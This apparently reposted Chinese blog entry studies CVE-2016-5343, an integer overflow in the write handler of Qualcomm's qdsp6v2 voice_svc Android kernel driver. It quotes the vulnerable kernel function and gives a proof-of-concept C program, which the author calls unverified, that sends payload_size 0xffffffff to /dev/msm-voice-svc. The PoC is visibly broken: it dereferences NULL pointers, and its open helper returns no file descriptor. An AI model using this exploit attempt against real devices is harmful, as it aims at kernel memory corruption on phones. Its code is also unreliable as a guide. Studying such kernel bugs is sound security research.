CVE-2016-5343分析

最新推荐文章于 2024-05-23 18:59:29 发布
最新推荐文章于 2024-05-23 18:59:29 发布
阅读量53 收藏
点赞数
文章标签: 移动开发
原文链接:http://www.cnblogs.com/Joe-Z/p/5918041.html
版权

最近在学习android内核漏洞,写篇博做个记录,也算是所学即用。 https://www.codeaurora.org/multiple-memory-corruption-issues-write-operation-qdsp6v2-voice-service-driver-cve-2016-5343,有高通的洞也是潜力无限,漏洞定位到/msm/drivers/soc/qcom/qdsp6v2/voice_svc.c的voice_svc_send_req,可以得知write操作能触发,没有搜到这个洞的poc,看补丁,是个整数溢出,用户控制的payload_size,传入kmalloc函数,payload_size+sizeof(struct apr_data)作为分配大小,于是很明显可产生整数溢出了,实际分配了比期望小很多的内存,后续引用该内存发生不可预期结果。

static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
                  struct voice_svc_prvt *prtd)
{
    int ret = 0;
    void *apr_handle = NULL;
    struct apr_data *aprdata = NULL;
    uint32_t user_payload_size = 0;

    pr_debug("%s\n", __func__);

    if (apr_request == NULL) {
        pr_err("%s: apr_request is NULL\n", __func__);

        ret = -EINVAL;
        goto done;
    }

    user_payload_size = apr_request->payload_size;//

    aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
              GFP_KERNEL);//会分配小于设定值的内存
    if (aprdata == NULL) {
        pr_err("%s: aprdata kmalloc failed.\n", __func__);

        ret = -ENOMEM;
        goto done;
    }

写了个poc,尚未经验证,先记录下,后续实验过后再完善:

 1 #include <stdlib.h>
 2 #include <stdio.h>
 3 #include <unistd.h>
 4 #include <sys/ioctl.h>
 5 #include <sys/types.h>
 6 #include <sys/stat.h>
 7 #include <fcntl.h>
 8 #include "voice_svc.h"
 9 
10 static int open_dev(const char *dev){
11     int fd=open(dev,O_RDWR);
12     if(fd<0){
13         printf("failed to open %s\n",dev);
14         exit(EXIT_FAILURE);
15     }
16 }
17 
18 int main(void){
19     struct voice_svc_write_msg *data=NULL;
20     data->msg_type=MSG_REQUEST;
21     struct voice_svc_cmd_request *apt_request;
22     apt_request->payload_size=0xffffffff;
23     
24     data->payload[0] = apt_request;
25     int fd=-1;
26     fd=open_dev("/dev/msm-voice-svc");//设备名有待确定
27     int ret;
28     ret=write(fd,data,(sizeof(*data)+sizeof(struct voice_svc_register)));
29     close(fd);
30         return 0;
31 }

 

转载于:https://www.cnblogs.com/Joe-Z/p/5918041.html

weixin_30906185
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
php 漏洞 怎么解决,php安全漏洞怎么修复?
weixin_39869693的博客
03-09 3657
该楼层疑似违规已被系统折叠隐藏此楼查看此楼PHP PHAR扩展安全漏洞(CVE-2016-4072)PHP ‘php_filter_encode_url’函数整数溢出漏洞(CVE-2016-4345)PHP ‘str_pad’函数整数溢出漏洞(CVE-2016-4346)PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)PHP Calendar...
TrustZone Kernel Privilege Escalation (CVE-2016-2431)
omnispace的博客
09-28 785
In this blog post we'll continue our journey from zero permissions to code execution in the TrustZone kernel. Having previously elevated our privileges to QSEE, we are left with the task of exploiti
Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)
浮生若梦的专栏
10-08 1万+
就在各位欢度国庆的时候,Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Ap
PostgreSQL CVE-2016-5423 BUG
weixin_33982670的博客
09-09 149
PostgreSQL CVE-2016-5423 BUG 作者 digoal 日期 2016-08-29 标签 PostgreSQL , CVE-2016-5423 , BUG 背景 PostgreSQL 的一个BUG,存在于9.5.3, 9.4.8, 9.3.13, 9.2.17, 9.1.22及以下版本。 在使用嵌套CASE WHEN语句时...
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】处理
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
12-30 20万+
概述 SSL/TLS协议信息泄露漏洞(CVE-2016-2183)漏洞: TLS, SSH, IPSec协商及其他产品中使用的DES及Triple DES密码存在大约四十亿块的生日界,这可使远程攻击者通过Sweet32攻击,获取纯文本数据。 风险级别:低 该漏洞又称为SWEET32(https://sweet32.info)是对较旧的分组密码算法的攻击,它使用64位的块大小,缓解SWEET32攻击OpenSSL 1.0.1和OpenSSL 1.0.2中基于DES密码套件从“高”密码字符串组移至“中”;但Op
CVE-2016-1000027分析
GalaxySpaceX的博客
04-10 9729
CVE-2016-1000027 漏洞原理和修复方法
CVE-2016-1000027安全漏洞分析和解决方案
不积跬步,无以至千里
05-31 1万+
CVE-2016-1000027 安全漏洞,该漏洞在5.x的最新版本(5.3.27)依然存在,官方未给出任何解决办法。在spring-web6.0之后,则不存在该漏洞。受影响范围:spring-web
【SWEET32、CVE-2016-6329、CVE-2016-2183、响应头】漏洞修复
famaslly的博客
03-05 916
1、设置标题、添加响应头、返回值。1、升级 OpenSSL 版本。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现(CVE-2016-5195)复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
TalkingData数据统计
runqu的博客
05-22 1141
TalkingData是一家提供移动应用数据统计和分析的公司,专注于移动应用数据的收集、分析和可视化。TalkingData通过收集应用程序的用户行为数据,如应用下载量、用户留存率、用户活跃度等,帮助开发者了解用户行为趋势、优化应用功能、改进用户体验,提升应用的用户参与度和用户留存率。
SwiftUI Transitions: Opacity, Slide, Move, Scale, Asymmetric
Daniel_coder的博客
05-17 1016
SwiftUI也有自己的转场动画Transition,主要包括有:Opacity,Slide,Move,Scale和Asymmetric等,好的转场动画能提供更好的界面舒适度,提升用户体验。
android高斯模糊填充imageview背景
cf8833的博客
05-21 219
说明:最近碰到一个需求,安卓app显示在线的url图片,然后imageview没占满的部分,使用该图片的模糊背景填充。
Android 屏保开关
最新发布
weixin_44021334的博客
05-23 323
设置-显示-屏保,
Flutter 中的 DrawerController 小部件:全面指南
smileKH的博客
05-22 346
是一个概念,指的是用于控制侧边抽屉显示和隐藏的逻辑和状态管理。虽然Flutter没有直接提供名为的组件,但是我们可以创建一个自定义控制器来管理Drawer组件的行为。
a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.是什么意思?
07-25
"a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624" 的意思是指一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同的漏洞。 CVE(Common Vulnerabilities and Exposures...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值